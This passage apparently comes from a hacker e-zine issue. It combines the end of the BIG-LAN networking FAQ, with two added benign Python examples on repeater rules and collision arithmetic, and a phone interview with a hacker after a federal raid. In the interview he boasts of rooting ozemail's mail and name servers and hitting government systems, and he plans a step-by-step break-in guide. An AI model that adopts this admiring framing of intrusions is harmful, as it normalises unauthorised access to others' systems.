            Ethernet-based LANs.)  Few administrators of networks doubt that a
            network can be large enough to require routers, or that there are
            situations where a bridge is an effective solution.  However,
            there is controversy as to where to draw the line.  Campus-sized
            networks, involving distances of up to a mile and possibly
            thousands of stations, can be, and have been, built solely out of
            one or the other.  The BIG-LAN Survey of 12/93 showed the
            following opinion among respondents:
      
             Survey question: "When you build a campus network, do you tend
             to use bridges as opposed to routers?"
      
             Answers: 13 said yes; 45 said no; 10 said some of each.
      
           Some clear tradeoffs: routers generally have to be set up no
           matter what whereas bridges can be plug-and-play on a network
           without too much total traffic; bridges generally have a higher
           speed-to-cost ratio and the low-end bridge is less expensive than
           the low-end router; routers handle huge networks with links of
           different speeds better.
      
        4. How do I know whether to use a bridge or a repeater?  How many
           repeaters may I put on an Ethernet?
      
           [Note: with the advent of 10BASE-F, this section needs updating.
           -ed]
      
            You cannot keep plugging in more repeaters and adding more cables
            to an Ethernet indiscriminately and expect it to work.  With too
            large a network, the protocol which keeps the number of collisions down
           (known as CSMA/CD) fails to do that.  The protocol documents
           supply rules-of-thumb which, if followed, prevent this from
           occurring.  If you break them, you may be risking large
           performance degradations.
      
            The latest version of the rules-of-thumb (which have been updated
            over time as new features like 10BASE-T have been added to the
            protocol) is in the IEEE 802.3 document describing 10BASE-T,
            specifically IEEE Std 802.3i-1990 in the section called "System
            Considerations for Multisegment 10 Mb/s Baseband Networks".
           The rules refer to the piece of the LAN that is between repeaters
           as a segment and refer to 4 kinds: 10BASE5 (i.e. "classic"
           Ethernet) and 10BASE2 (i.e., ThinWire Ethernet) both classified as
           "Coax" segments and FOIRL (fiber inter-repeater links) and
           10BASE-T, both classified as "Link" segments, and both of which
           have the property that you can attach things only to their ends.
           The basic repeater rule is that between any two stations on the
           LAN, there may be at most 4 repeaters and three coax segments.  In
           addition, there are length restrictions on the segments which are
           designed to keep CSMA/CD working properly:
      
              10BASE5         500 meters
              10BASE2         185 meters
              FOIRL           500 meters (1000 meters in some cases)
              10BASE-T        100 meters (or more)
      
           FOIRL links can be 1000 meters if you have at most 3 repeaters
           between stations instead of 4.  10BASE-T links can be longer if
           the cable will support it: CSMA/CD is not the limiting factor on
           10BASE-T.  For the purposes of this discussion, bridges, routers,
           and gateways are "stations" since the CSMA/CD protocol does not
           pass through them.  Thus if you discover these rules prevent you
           from putting a repeater in the network where you need one, then
           you can put a bridge there instead, or perhaps split the LAN
           somewhere else using a bridge.
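
            The repeater rules above can be checked mechanically for any
            station-to-station path.  The following is an added example, not part
            of the original memo: the path notation (a list of segments and relay
            names) and the sample paths are constructed for illustration, and the
            limits are the ones stated in the text and table above.

```python
COAX_LIMITS = {"10BASE5": 500, "10BASE2": 185}   # metres, from the table above
FOIRL_LIMIT = 500
FOIRL_EXTENDED_LIMIT = 1000    # allowed with at most 3 repeaters in the path
MAX_REPEATERS = 4
MAX_COAX_SEGMENTS = 3
STATION_RELAYS = {"bridge", "router", "gateway"}  # CSMA/CD does not pass these


def split_domains(path):
    """Cut a station-to-station path at every bridge, router or gateway."""
    domains, current = [], []
    for hop in path:
        if hop in STATION_RELAYS:
            domains.append(current)
            current = []
        else:
            current.append(hop)
    domains.append(current)
    return domains


def check_domain(domain):
    """Return the rule violations for one repeater-only stretch of a path."""
    repeaters = sum(1 for hop in domain if hop == "repeater")
    segments = [hop for hop in domain if hop != "repeater"]
    problems = []
    if repeaters > MAX_REPEATERS:
        problems.append(f"{repeaters} repeaters in path, at most "
                        f"{MAX_REPEATERS} allowed")
    for hop in segments:
        if not isinstance(hop, tuple):
            raise ValueError(f"unknown path element: {hop!r}")
    coax = sum(1 for kind, _ in segments if kind in COAX_LIMITS)
    if coax > MAX_COAX_SEGMENTS:
        problems.append(f"{coax} coax segments in path, at most "
                        f"{MAX_COAX_SEGMENTS} allowed")
    for kind, metres in segments:
        if kind in COAX_LIMITS:
            limit = COAX_LIMITS[kind]
        elif kind == "FOIRL":
            limit = FOIRL_EXTENDED_LIMIT if repeaters <= 3 else FOIRL_LIMIT
        elif kind == "10BASE-T":
            continue   # cable quality, not CSMA/CD, sets this length
        else:
            raise ValueError(f"unknown segment type: {kind!r}")
        if metres > limit:
            problems.append(f"{kind} segment of {metres} m exceeds {limit} m")
    return problems


def check_path(path):
    """Return (domain_index, problem) pairs for a whole path."""
    return [(index, problem)
            for index, domain in enumerate(split_domains(path))
            for problem in check_domain(domain)]


# Constructed sample paths between two end stations.
MAX_LEGAL = [("10BASE5", 500), "repeater", ("FOIRL", 500), "repeater",
             ("10BASE5", 500), "repeater", ("FOIRL", 500), "repeater",
             ("10BASE5", 500)]
FIVE_REPEATERS = MAX_LEGAL + ["repeater", ("10BASE-T", 100)]
WITH_BRIDGE = MAX_LEGAL + ["bridge", ("10BASE-T", 100)]
FOUR_COAX = [("10BASE2", 185), "repeater", ("10BASE2", 185), "repeater",
             ("10BASE2", 185), "repeater", ("10BASE2", 185)]
LONG_FOIRL_3 = [("10BASE2", 185), "repeater", ("FOIRL", 900), "repeater",
                ("10BASE2", 185)]
LONG_FOIRL_4 = [("10BASE-T", 100), "repeater", ("FOIRL", 900), "repeater",
                ("10BASE-T", 100), "repeater", ("10BASE-T", 100), "repeater",
                ("10BASE2", 185)]

if __name__ == "__main__":
    for name in ("MAX_LEGAL", "FIVE_REPEATERS", "WITH_BRIDGE", "FOUR_COAX",
                 "LONG_FOIRL_3", "LONG_FOIRL_4"):
        print(name, check_path(globals()[name]) or "ok")
```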
      
        5. Should I use "manageable" hubs, concentrators, etc on my LAN?
      
           This is a controversial question also.  Vendors have attempted to
           make hubs and concentrators that require little training &
           manpower to manage & troubleshoot, and they will attempt to
           convince you that they have succeeded.  You pay a premium for
           "manageability".  Those who remain skeptical wonder how much the
           management features are ever used: for example, management allows
           you to turn on & off ports from an operator's console; how often
           do you need to do such a thing?  Also, some of the benefits
           attributed to management packages are simply due to good record
           keeping, something which the administrator must find the manpower
           to accomplish with a management package or without one (presumably
           with a simple dbms, which can often be tailored more to the
            administrator's needs).
      
        6. Which LAN technology should I use?  Arcnet?  FDDI?  Token Ring?
           10BASE-T?
      
           A controversial question.  Some questions & answers from the 12/93
           BIG-LAN Reader Survey:
      
             "When you install a LAN, which "Technology" (e.g.  Ethernet,
             Token Ring) do you prefer?"
      
              All respondents said Ethernet, though three also said FDDI
              is good.
      
             "If you have experience with two or more LAN technologies, which
             have you found works better?"
      
             Answers received:
             Ethernet works best                18
             10BASE-T is best                    6
             Ethernet & FDDI work best           3
             Ethernet is better than Token Ring  2
             Ethernet costs less than FDDI       2
             Localtalk better than 10BASE-T      1
             FDDI is best                        1
             Ethernet is better than Pronet-10   1
             Ethernet is better than ARCNet      1
             Ethernet is better than PhoneNet    1
             Ethernet followed by FDDI           1
             Ethernet & Token Ring equal         1
             Depends on how they are maintained  1
      
        7. What is the ideal cable to install in a new building?
      
           Distribution runs, i.e., phone closet to room: Best possible thing
           to do is to leave usable pathways for future expansion.  Whatever
           you do, install at least 2 pair and probably 4 pair of data grade
           unshielded twisted pair.  It will always have uses.  Install
           something else too if you are tied to a particular vendor.
           Multimode fiber might become popular in the future but that is a
           gamble.
      
           Riser runs, i.e., phone closet to phone closet: it is imperative
           to leave usable pathways for future expansion.  For Ethernet,
           ThinWire is a usable riser cable, multimode fiber is possible
           too.
      
        8. What is the ideal cable to install between buildings on a campus?
      
           Trunks, i.e., cables into the building: pathways for future
           expansion very valuable.  Multimode fiber is useful, run 24 fibers
           if you can.  Use cable with some single mode too.  Run several
           times what you need initially and leave a lot of the unused fiber
           unterminated for the time being.  Cable pulling & termination are
           much more costly than the cable itself.
      
        9. Whose routers are recommended?
      
           Question & answer from the 12/93 BIG-LAN Reader Survey:
      
             "Name some router vendors whose routers you have used and
             recommend:"
      
             Cisco got 55 mentions; Wellfleet 9; Proteon 8; 3Com 3; Novell 3;
             Xyplex 3; Network Systems 2; DEC 2; HP 2; NAT 2; Retix 1; NAC 1;
             GatorBox 1; Alantec 1; Telebit 1; Fibronics 1; Shiva 1;
             PCRoute 1.
      
        10. Whose bridges are recommended?
      
           Question & answer from the 12/93 BIG-LAN Reader Survey:
      
             "Name some bridge vendors whose routers you have used and
             recommend:"
      
             DEC got 11 mentions; 3Com 8; Cabletron 5; Retix 5; Xyplex 5; HP
             4; Cisco 3; Gandalf 3; Wellfleet 2; D-link 1; Asante 1; ODS 1;
             Synernetics 1; PlainTree 1; Alantec 1; Artel 1; Develcon 1;
             Gandalf 1; karl-bridge 1; Allied Telesis 1; Vitalink 1; ATT 1.
      
        11. Whose Ethernet equipment is recommended?
      
           Question & answer from the 12/93 BIG-LAN Reader Survey:
      
             "Name some Ethernet concentrator/transceiver/repeater vendors
             whose Ethernet equipment you have used and recommend:"
      
             Cabletron got 30 mentions; 3Com 15; Allied Telesis 15; HP 13;
             Synoptics 11; Asante 9; Chipcom 8; DEC 7; SMC 7; David Systems
             4; Xyplex 3; Milan 2; Lantronix 2; Gandalf 2; D-Link 2; Canary
             2; ATT 2; BlackBox 2; Hughes 2; Fibermux 2; St. Clair 1;
             Pirelli-Focom 1; Pilkington 1; ODS 1; Networth 1; LANNET 1;
             Kalpana 1; Isolan 1; Interphase 1; Intel 1; IMC 1; Hirschmann 1;
             Fibercom 1; BICC 1.
      
        12. Whose Token Ring equipment is recommended?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some Token Ring equipment vendors whose Token Ring
             equipment you have used and recommend:"
      
             IBM was mentioned by 12 responders; Proteon 3; ODS 2; UB 1;
             Thomas-Conrad 1; Startek 1; Madge 1; HP 1; Cabletron 1; CSP 1.
      
        13. Whose FDDI equipment is recommended?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some FDDI equipment vendors whose FDDI equipment you have
             used and recommend:"
      
             Cisco was mentioned by 8 responders; Crescendo 7; DEC 5;
             Synoptics 3; Interphase 3; 3Com 3; Fibronics 2; Cabletron 2;
             Synernetics 1; Sun 1; SGI 1; Proteon 1; PlainTree 1; ODS 1;
             Network Peripherals 1; IBM 1; Fibermux 1; Chipcom 1.
      
        14. What PC network software is recommended?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some PC network software vendors whose PC network software
             you have used or recommend:"
      
             Novell was mentioned by 32 responders; FTP Software 21; Apple 7;
             SunSelect 6; Microsoft 5; NCSA 4; IBM 4; Banyan 4; DEC 4;
             NetManage 3; Clarkson 3; 3Com 3; Word Perfect 2; WinQVT 2;
             Reflection 2; Qualcomm 2; Brightworks 2; Beame & Whiteside 2.
      
        15. What protocols should run on a campus-wide LAN?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some protocols that you use to interconnect your campus
             that you would recommend:"
      
             TCP/IP was mentioned by 63 responders; IPX 26; AppleTalk 17;
             DECNet 7; LAT 3; VINES 2; SNA 2; CLNS 1.
      
        16. What software is recommended for managing a campus-wide LAN?
      
           Queries and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some network management system that you use for the
             management of a campus LAN, that you recommend:"
      
             SunNet Manager was mentioned by 13 respondents; HP OpenView 8;
             Cabletron Spectrum 3; Cabletron Remote LanView 3; PSI SNMP 2;
             Netlabs 2; CiscoWorks 2.
      
             "Name other software that you use for the management of a campus
             LAN that you recommend:"
      
             Ping was mentioned by 4 respondents; Traceroute 3; SunNet
             Manager 2; Network General Sniffer 2; Neon Software NetMinder 2;
             CMU SNMP 2.
      
        17. What terminal server is recommended?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name vendors of terminal servers that you use and recommend:"
      
             Cisco was mentioned by 21 respondents; Xylogics 12; Xyplex 11;
             DEC 9; Emulex 4; Spider 2; Equinox 2; Netblazer 1; Livingston 1;
             Lantronix 1; HP 1; Datability 1; Digiboard 1; Allied Telesis 1;
             3Com 1.
      
        18. Whose troubleshooting equipment is recommended?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some vendors of network troubleshooting equipment that you
             use and would recommend:"
      
             Network General was mentioned by 30 respondents; HP 11;
             MicroTest 4; Tektronix 3; Spider 3; Fluke 3; FOTEC 3; W&G 2;
             Novell 2; FTP 2; Exfo 2; Van Jacobson 1; Pentascanner 1; NCC 1;
             NAT 1; LM-1 1; Consultronics 1; Antel 1; AG Group 1.
      
        19. What security products should I buy?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "Name some security products that you use to maintain security
             on your campus LAN that you recommend:"
      
             COPS was mentioned by 5 respondents; tcpwrapper(s) 3; SecurID 3;
             Crack 3; Cisco access control 2; xtacacs 1; npassword 1;
             Tripwire 1; Socks 1; Netware 1; Native VINES security 1; McAfee
             Anti-Virus NLM 1; HP 1; Bridges 1; Beame and Whiteside 1.
      
        20. Should the names of devices on my campus LAN have subdomains?
      
             Example of name without subdomain: bigvax.sequoia.edu; example
             with subdomain: bigvax.acs.sequoia.edu.  It is possible to run
             networks of thousands of computers without the bother of
             subdomains, but they have some advantages.
      
           Queries and answers from the 12/93 BIG-LAN Reader Survey:
      
             "For Internet names of nodes on a campus network that supports
             TCP/IP, do you prefer the use of subdomains?"
      
             49 responders said yes, 11 said no, 3 said it depends.
      
             "If you have worked on a campus that utilizes subdomains and one
             that does not, which does your experience tell you is the better
             way to administer names in a campus network?"
      
             13 responders said the LAN with subdomains worked better; 1 said
             the LAN without subdomains worked better; 2 said it doesn't
             matter and 3 said it depends.
      
        21. Should client stations use POP?  Should they use just SMTP?
            Should I use some non-TCP/IP protocol for mail to/from client
            stations?
      
           Query and answers from the 12/93 BIG-LAN Reader Survey:
      
             "For client station's mail, which do you prefer: SMTP;
             TCP/IP-based client-server protocols (e.g.  POP, POP2, etc);
             other LAN protocols?"
      
             22 responders preferred TCP/IP-based client-server protocols
             (e.g.  POP, IMAP, PCMAIL); 20 preferred SMTP; 5 preferred other
             LAN protocols; 3 said "use all three"; 3 said "SMTP and
             TCP/IP-based client-server protocols"; 3 said "SMTP and other
             LAN protocols"; 1 said "TCP/IP-based Client-server Protocols and
             other LAN protocols".
      
        22. Should I enable SQE/heartbeat?
      
           SQE Test (often labeled "SQE" by vendors) is part of IEEE 802.3
           that is designed to test part of the MAU (transceiver)
           hardware.  It basically consists of the MAU trying out the
           collision signal line immediately after each packet it sends.
           Thus a station on the network can verify that the MAU is working
           by watching for this signal and can log an error for you if the
           signal is not present.  Correct practice is to turn SQE Test off
           on any MAU that is attached to a repeater and turn it on on any
           MAU attached to a station.  Not doing this can lead to incorrect
           repeater operation and/or a lack of logging of serious network
           errors when they occur.
      
           However, many vendors of networkable stations take no advantage of
           SQE Test (it was new to IEEE 802.3 & Ethernet Version 2, not being
           present in earlier Ethernet) and there have been many reports of
           stations that won't even work properly when it is enabled.  Thus
           your dilemma: some of your users may have stations that won't work
           unless you set your MAUs wrong.  Maybe some day all vendors will
           fall into line, or the IEEE will revise its standard to get rid of
           SQE Test.  In the meantime you are forced to know which stations
           log errors without it and which ones work poorly with it on.
           Examples of computers/networking equipment sensitive (one way or
           the other) to SQE test:
      
           Definitely can't handle SQE Test:
               No convincing confirmations
      
           Mixed & inconclusive reports saying they can't handle SQE Test:
               Some Sun workstations
               Cisco routers
      
           Needs SQE Test or it reports errors (i.e., uses SQE Test as
           intended):
               VAX/VMS
               Alpha/VMS
      
        23. If I have a thinwire network interface card, how do I connect it
            to a 10BASE-T concentrator?
      
           The Ethernet standard provides only one way to interconnect
           thinwire (10BASE2) and 10BASE-T: using a repeater (e.g. a
           concentrator).  Since this is expensive and it increases the
           repeater count, thus limiting the expanse of the rest of the
           network, customers want, and several vendors provide, adaptors that
           are not real repeaters.  Typically, these allow a 10BASE-T segment
           to end in a shorter-than-usual thinwire segment.  One depends upon
           the vendor to provide instructions as to how its use affects the
           limitations on segment lengths and repeater counts.
      
        24. How much does a collision slow down an Ethernet packet?
      
           Perhaps you've noticed the phenomenon that you might ask otherwise
           intelligent & knowledgeable network professionals how many
           collisions indicate too much load, and they immediately divert the
           conversation to the question of whether your network is broken.
           The implication is that they're more inclined to believe your
           Ethernet is performing poorly due to being broken than due to load.
           Here's an explanation, probably more than you ever wanted to
           know:
      
           Coaxial Ethernet was designed so that everyone shares the same
           single cable.  Electrical characteristics of transmission were
           chosen so that when more than one station places bits on the
           network, the voltages in effect "add" and the transceiver can
           sense the "unusual" voltage as a collision.
      
           Transceivers detect the collisions, and signal the stations by
           raising a "collision detect" line to the station.  According to
           the standard, a transceiver signals any collision that occurs when
           it is sending a packet, and also any triple collision.
      
           The Network Interface hardware takes care of retransmissions and
           reports the collision to the driver.  It might not report complete
           information on the number of collisions--for example, one Ethernet
           chip will report after each packet it sends, whether there were 0,
           1, 2, <16, or >16 Collisions.  The driver usually keeps a count
           that it updates from the information it gets from the card.
      
           Repeaters do not "recreate" electrical collisions on other
           networks.  Any time the repeater detects a collision, it is, by
           definition, in the midst of transmitting a packet.  It can no
           longer pick up valid data off the net to continue sending the
           packet.  The Ethernet spec says it should start sending 32 bits of
           made-up data (called a JAM) that will make the packet terminate
           early, with a CRC error.  No receiving stations on the other
           side of the repeater will see "collision" signaled by their
           transceiver.  Instead, they will receive just the beginning of a
           packet.  This is called a "runt".  The network interface hardware
           could, theoretically, report a runt as a collision, which might be
           useful for some kinds of monitoring.  Or the software might
           consider a runt a collision and increment the same count.  Or it
           can count them separately, or not count them at all.  Software
           that reports these separately from collisions usually refers to
           them as runts or JAMs.
      
           Link segments like 10BASE-T, FOIRL and 10BASE-FL attach only two
           devices and have separate paths in each direction.  Thus
           collisions are superfluous, but must still be detected and
           reported since Ethernet interfaces cannot be assumed to have the
           ability to send and receive packets at the same time.  Thus the
           transceivers watch for packets flowing in both directions at the
           same time, and signal collision to the station as well as produce
           a JAM signal on the line so that the stations trying to send the
           packets will get the message that this was a collision and the
           packet needs to be resent.
      
           Ethernet interfaces retransmit packets up to 16 times with an
           exponential backoff for the first 10.  The minimum retransmission
           time is relatively quick and the detection process takes a fixed
           amount of time, so 75% of all times that two stations are
           contending for a net are resolved with one station starting a
           successful transmission within 250 microseconds.  It is important
           to realize that Ethernet's collisions are a normal part of
           scheduling the use of the LAN, that it is used only when carrier
           sensing doesn't do the trick, and that Ethernet uses a
           third-generation scheme that handles collisions very smoothly when
           the hardware works & is properly assembled, even under high
           loads.  A lot of mis-information is spread about collisions, often
           from people dealing with Ethernet's competitors, but also often
           from Ethernet users who simply haven't studied it too closely, or
           listened to the wrong people.
      
           A collision is always detected & taken care of (to the point of
           starting the backoff) within the first 50 microseconds of a
           packet's transmission on a correctly functioning Ethernet.  Aside
           from helping to limit the time spent dealing with collisions, this
           ensures that collisions of even the smallest legal packets are
           always detected.  Some interface hardware reports late collisions,
           i.e. collisions signaled after this time:  unlike collisions,
           which are normal, late collisions are a type of error.  Note that
           on the other side of a repeater, the late collision simply looks
           like a CRC error perhaps with an alignment error.  There are two
           causes of late collisions:  faulty hardware; or the network being
           too large.  In either case, it tells you that the network is
           having a problem, and packets are almost surely being lost
           sometimes, causing unnecessary & occasionally severe performance
           penalties.  If the network is too large, properly placed routers,
           bridges (or some switches) can subdivide it into two
           properly-sized Ethernets.
      
           Can random collisions cause packets to be lost?  The exponential
           backoff algorithm yields a probability of 50% that a pair of
           colliding packets require more than one retransmission to get
           through if two stations are contending for the net at exactly the
           same time, and only 25% of the ones that still haven't succeeded
           fail to get through after the second retransmission.  For the
           16-retry limit, the calculation of the fraction not making it is:
      
                        1/2 x 1/4 x .... 1/(2**10) x (1/(2**10))**6
      
           or           (1/2)**115
      
           or about     (1/10)**34.
      
           I conclude that on every Ethernet ever installed, for every packet
           sent, that this has never happened (give me a billion LANs that
           transmit a billion packets every day for a billion days and the
           odds are still a million to one against even one lost packet).
           When more than two stations are involved (i.e., more than two
           stations have something to send at exactly the same time), these
           odds aren't so overwhelming--thus I conclude that there have
           indeed been packets lost on correctly functioning Ethernets
           somewhere (Note:  also the randomness of the backoff is probably
           not perfect and I've heard of network interfaces that illegally
           stop before 16 retries!).  Recall also that stations do sense
           carrier: collisions only resolve the problem of what happens when
           the packets start at almost the same time.  Probably the most
           usual time for a collision is when two stations simultaneously see
           the end of a packet, both having a packet to send.  In this case,
           there will be more than one collision on average, but as stated
           above, 75% of the time, one of them will have started a successful
           transmission within 250usec.
      
           In contrast to the smooth handling of properly detected
           collisions, an undetected collision causes a packet to be lost,
           which must be retransmitted by software:  for example NFS is often
           set to time out at .5 seconds, so a lost packet (for example, the
           result of an undetected collision) causes a delay typically 2000
           times longer.  Networks with problems that cause undetected
           collisions, frequent unnecessary collisions, or lose packets for
           other reasons are much worse performance killers than collisions
           caused by an increase in load.
      
           How many packets can you tolerate an Ethernet losing?  1 in 100?
           1 in 1000?  1 in 10,000?  1 in 100,000?  Depends.  1 in 100 is
           very bad.  Where do you draw the line?  Back-of-an-envelope
           example of the effects:  NFS often transmits blocks of 6 Ethernet
           packets, the loss of any one of which results in the
           retransmission of all 6.  The loss of one packet in 12,000 means
           that every 2,000th block takes on the order of 2000 times longer
           to complete than normal, or performance is decreased to 50% of
           that on a working Ethernet.
      
           The Ethernet's packet loss problems are relative to those of your
           router, bridge, or switch.  Routers, bridges, and switches lose
           packets when their buffers fill up, so if your
           router/bridge/switch is losing one packet in 10,000, then for
           traffic passing through the router/bridge/switch, addressing an
           Ethernet packet loss rate of 1/100,000 would have little effect,
           and addressing an Ethernet packet loss rate of 1/10,000 would help
           no more than addressing your router/bridge/switch problem.
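
           Added example (not part of the original memo): the two-station
           backoff arithmetic and the NFS back-of-an-envelope estimate from
           this answer, worked through in Python.  It assumes the model the
           text describes (after the n-th collision each station waits a
           uniformly random number of slots out of 2**min(n,10)); all
           function names are this example's own.

```python
from fractions import Fraction
import random

BACKOFF_CAP = 10   # window stops doubling after the 10th collision (per the text)
RETRY_LIMIT = 16   # interface gives up after 16 retransmissions (per the text)


def recollision_probability(n, cap=BACKOFF_CAP):
    """Chance that two stations collide again on retransmission n.

    Assumed model: each station independently waits a uniform number of
    slots in 0 .. 2**min(n, cap) - 1, and they collide again only if both
    pick the same slot.
    """
    return Fraction(1, 2 ** min(n, cap))


def loss_probability(retry_limit=RETRY_LIMIT, cap=BACKOFF_CAP):
    """Exact chance that every one of retry_limit retransmissions collides."""
    p = Fraction(1)
    for n in range(1, retry_limit + 1):
        p *= recollision_probability(n, cap)
    return p


def simulate(trials, retry_limit=RETRY_LIMIT, cap=BACKOFF_CAP, seed=1):
    """Monte Carlo check of the same two-station model.

    Returns a list h where h[k] (k >= 1) counts contentions resolved on
    retransmission k and h[0] counts packets dropped at the retry limit.
    """
    rng = random.Random(seed)
    hist = [0] * (retry_limit + 1)
    for _ in range(trials):
        for n in range(1, retry_limit + 1):
            window = 2 ** min(n, cap)
            if rng.randrange(window) != rng.randrange(window):
                hist[n] += 1          # different slots: one station gets through
                break
        else:
            hist[0] += 1              # all retransmissions collided
    return hist


def nfs_relative_throughput(packet_loss, packets_per_block=6, penalty=2000):
    """Throughput relative to a loss-free LAN for block-oriented traffic.

    A block is lost if any of its packets is lost; a lost block is assumed
    to take `penalty` times as long as a normal one (the text's figure).
    """
    block_loss = 1 - (1 - packet_loss) ** packets_per_block
    mean_time = (1 - block_loss) + block_loss * penalty
    return 1 / mean_time


if __name__ == "__main__":
    p16 = loss_probability()
    print("16-retry loss probability: 2**-%d (about %.1e)"
          % (p16.denominator.bit_length() - 1, float(p16)))
    # An interface that gives up early (the text mentions some do) loses more.
    print("8-retry loss probability:  about %.1e" % float(loss_probability(8)))
    # A billion LANs x a billion packets a day x a billion days = 10**27 packets.
    print("expected losses in 10**27 packets: %.1e" % float(p16 * 10 ** 27))
    hist = simulate(100000)
    print("resolved on 1st retransmission: %.3f" % (hist[1] / 100000))
    print("relative NFS throughput at 1/12,000 loss: %.3f"
          % float(nfs_relative_throughput(Fraction(1, 12000))))
```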
      
        25. Should I worry about Ethernet tailgating?
      
           Tailgating is a phenomenon resulting from bugs in the design
           of Ethernet interfaces, which some vendors claim are due
           to ambiguities or changes in the Ethernet specification.  There
           was indeed a change in the IEEE 802.3 specification's wording
           designed to eliminate misunderstanding.
      
           Tailgating problems consist of packets following close after
           packets, collisions, and/or noise: so close that some network
           interfaces aren't ready to receive them yet.
      
           The standard says network interfaces should wait a minimum of
           9.6us after the end of a packet before sending another (the
           "interpacket gap").  Network interfaces typically don't start
           detecting the beginning of packets for a while after the end of a
           packet (i.e. carrier goes to idle) to avoid trying to treat the
           typical noise at the end of a packet as the beginning of the next
           packet.  This has been called its "blind time".  The standard
           doesn't specify how long the blind time should be, but naturally
           it must be less than the 9.6us interpacket gap.  However on real
           products, the blind times vary between a fraction of 1us and 4us
           or longer.
      
           Another element is that some network interfaces sometimes send 24
           bits of data while the line is idle: not a real packet:  somehow
           this causes short interpacket gaps.  My guess is that it makes
           some interfaces go blind while not stopping other interfaces
           from sending immediately.
      
           Some interfaces don't wait 9.6us after a collision before sending
           a packet.
      
           There have been interfaces that cheat on the 9.6us interpacket
           gap after a packet.  This is so explicitly against the standard
           that vendors of such products have been quick to fix them.
           Some products:
      
                                                   Tailgate     Tailgate
                                 Blind    24Bit    after        after
                                 Time     Garbage  Collisions   Packets
                                 -------  -------  ----------   --------
            IBM PCMCIA           0.6us
            (Notebook Sniffer)
      
            Intel 82596          4.6us              x
            (Desktop Sniffer)
      
            SEEQ 8003                      x        x
            (Cisco, oldSGI)
      
            AMD Lance AM7990     >4us
            (Sun)
      
            Intel 82586          long               x
            (oldSun)
      
            oldKalpana                                           x
                                 -------   -------  ----------   --------
                                                    Tailgate     Tailgate
                                 Blind     24Bit    after        after
                                 Time      Garbage  Collisions   Packets
      
           (Notes: Information from InfoWorld, 11/93 and 3/94; IBM PCMCIA
           cards are highly immune to the problems; Kalpana has fixed its
           switches)
      
           Example: If a network has two Suns that have Intel 82596 Ethernet
           chips (A and B) and two other stations (C and D), you can have the
           following situation:
      
             C and D send packets which collide.
             A sends a packet to B too soon after the collision.
             B remains blind too long to receive the packet.
      
           Thus TCP, NFS, or whatever, must retransmit.  Typical NFS
           retransmission time would be in the .5 to 1 second range, thus one
           lost packet translates into .5-1 second of waiting.  TCP
           retransmission time adjusts itself to the network & is typically
           shorter between stations on the same LAN, but, for example, can be
           long if the packet is lost between a station and a router while
           the station is talking over a WAN.
      
           End of Memo: BIG-LAN Frequently Asked Questions
     
     @HWA
     
25.0  INTERVIEW:  Exclusive: Fuqrag gets raided by OSI, NASA, FBI, Interpol.     
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
      Short interview with fuqrag after his raid last Thursday. He is to be
      indicted and is not allowed access to computer equipment, (all his
      gear was confiscated), so we set up a telephone chat and below are the
      highlights of that conversation. Some chatter and personal chit-chat
      was deleted for brevity. Fuqrag has ok'd this for release. - Ed
      
      
      Phone interview with Fuqrag by Cruciphux
      
      Sat Feb 19th, 2:30pm   2000
      
      HWA = Cruciphux
      FR  = Fuqrag
      
      Transcript start
      
      
      <HWA>  how ya doin?
      
      <FR>   i got raided last thursday
      
      <HWA>  ah shit what happened or can u talk about it??
      
      <FR>   it was a bunch of bs. well.. let's see they didn't arrest me yet
      
      <HWA>  uhm, Ok.
      
      <FR>   just search and seizure shit
      
      <HWA>  they took shit?
      
      <FR>   yeah, all my shit
      
      <HWA>  you got receipts and all that? what did they take? 'everything' ?
             and whos they? feds? or police?
             
      <FR>   fbi, osi, nasa, and some dude from interpol
      
      <HWA>  nice
      
      <FR>   it's cool
      
      <HWA>  heavy shit then.so what did they say it was 'about'?specific boxes?
      
      <FR>   heavier than usual, they asked me all kinds of shit ...
             i'm gonna be indicted (when the time comes) on approx. 138 counts
             
      <HWA>  fuck.
      
      <FR>   and that's just in this country
      
      <HWA>  what else? who else wants you?
      
      <FR>   i hit a lot more systems than most realize, most i did.. were not
             about defacing and shit.             
             they're investigating me because of the nato shit
             
             
      <HWA>  yet ppl still hit gov sites and mil sites
      
      <FR>   ya
      
      <HWA>  What do they want to do?
      
      <FR>   it got really crazy when i started up my shit
      
      <HWA>  you're what? 17 right?
      
      <FR>   now it seems like there's twice as much as then b4 i started..
             nope 30.
             
      <HWA>  oh sorry, i'm 35 heh welcome to the old men's club heh.
      
      <FR>   it's ok, if u ever spoke to me.. or saw me.. u'd never guess i 
             was 30, shit.. u'd never believe that i was over 21 probably.
             
      <HWA>  you live alone/married?, family?
      
      <FR>   alone
      
      <HWA>  thats a plus in this case I suppose
      
      <HWA>  do you have a good lawyer? where are u located anyway btw?
      
      <FR>   in the states
      
      <HWA>  so you could lose alot then
      
      <FR>   it's cool cool
      
      <HWA>  they talking deals? a job offer? (laughs)
      
      <FR>   not yet
      
      <HWA>  they should
      
      <FR>   heh, i'm tryin to get a job with the nsa actually, (laughs)      
      
      <HWA>   some countries look at hackers/crackers as a "national 
              resource"... you seem pretty calm about the whole deal
              
      <FR>    well, what can ya do?! ya know? heh.
      
      <HWA>   true
      
      <FR>    just in case tho, i've started writing a book (laughs)
      
      <HWA>   good plan, if you write anything you want published i'll put
              it out under whatever conditions u want.
              
      <FR>    it's sorta like the "hacking exposed" shit... except, that i'm 
              showing people how to get into "any" webserver and/or internet 
              based system, period.. step-by-step. no matter what the OS
              
      <HWA>   the feds wouldn't like that,  many admins would tho, I know I 
              would.
      
      <FR>    ever heard of those ozemail.com.au people? they're pretty big..
      
      <HWA>   yes, not much tho
      
      <FR>    i rooted there mail.ozemail.com.au
      
      <HWA>   just recently got a new aussie contact maybe hear more from them.
      
      <FR>    and there ns's too.. and gonna show ppl how i did it, etc.. shit
              like that
      
      <HWA>   when did you start hacking then?
      
      <FR>    when i was 12
      
      <HWA>   your story should be pretty close to mine, you had the whole 
              underground bbs thing? fidonet boards and shit?
              
